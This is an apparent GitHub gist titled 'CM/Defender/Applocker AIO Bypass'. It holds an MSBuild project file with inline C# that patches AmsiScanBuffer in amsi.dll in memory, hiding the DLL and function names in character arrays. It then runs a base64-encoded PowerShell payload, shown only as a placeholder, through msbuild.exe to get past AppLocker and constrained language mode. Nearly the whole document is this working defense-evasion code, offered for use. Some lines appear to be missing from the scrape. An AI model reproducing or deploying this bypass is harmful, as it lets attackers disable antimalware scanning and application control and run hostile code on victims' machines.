Skip to content

Instantly share code, notes, and snippets.

Created May 29, 2019
What would you like to do?
CM/Defender/Applocker AIO Bypass
<Project ToolsVersion="4.0" xmlns="">
<!-- C:\Windows\Microsoft.NET\Framework\v4.0.30319\msbuild.exe build.csproj -->
<Target Name="Bypass">
AssemblyFile="C:\Windows\Microsoft.Net\Framework\v4.0.30319\Microsoft.Build.Tasks.v4.0.dll" >
<Reference Include="System.Management.Automation" />
<Code Type="Class" Language="cs">
using System;
using System.Text;
using System.IO;
using Microsoft.Build.Framework;
using Microsoft.Build.Utilities;
using System.ComponentModel;
using System.Collections.Generic;
using System.Collections.ObjectModel;
using System.Runtime.InteropServices;
using System.Management.Automation;
using System.Management.Automation.Runspaces;
public class BypassCLM : Task, ITask
public static extern IntPtr GetProcAddress(IntPtr hModule, string procName);
public static extern IntPtr LoadLibrary(string name);
public static extern bool VirtualProtect(IntPtr lpAddress, UIntPtr dwSize, uint flNewProtect, out uint lpflOldProtect);
static int Bypass()
char[] chars = { 'A', 'm', 's', 'i', 'S', 'c', 'a', 'n', 'B', 'u', 'f', 'f', 'e', 'r' };
String funcName = string.Join("", chars);
char[] chars2 = { 'a', 'm', 's', 'i', '.', 'd', 'l', 'l' };
String libName = string.Join("", chars2);
IntPtr Address = GetProcAddress(LoadLibrary(libName), funcName);
UIntPtr size = (UIntPtr)5;
uint p = 0;
VirtualProtect(Address, size, 0x40, out p);
Byte[] Patch = { 0xB8, 0x57, 0x00, 0x07, 0x80, 0xC3 };
Marshal.Copy(Patch, 0, Address, 6);
return 0;
public override bool Execute()
Runspace run = RunspaceFactory.CreateRunspace();
PowerShell shell = PowerShell.Create();
shell.Runspace = run;
byte[] data = Convert.FromBase64String("payload");
string exec = Encoding.Unicode.GetString(data);
Collection<PSObject> output = shell.Invoke();
foreach( PSObject o in output )
foreach( ErrorRecord err in shell.Streams.Error )
Console.Write("Error: " + err.ToString());
return true;
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment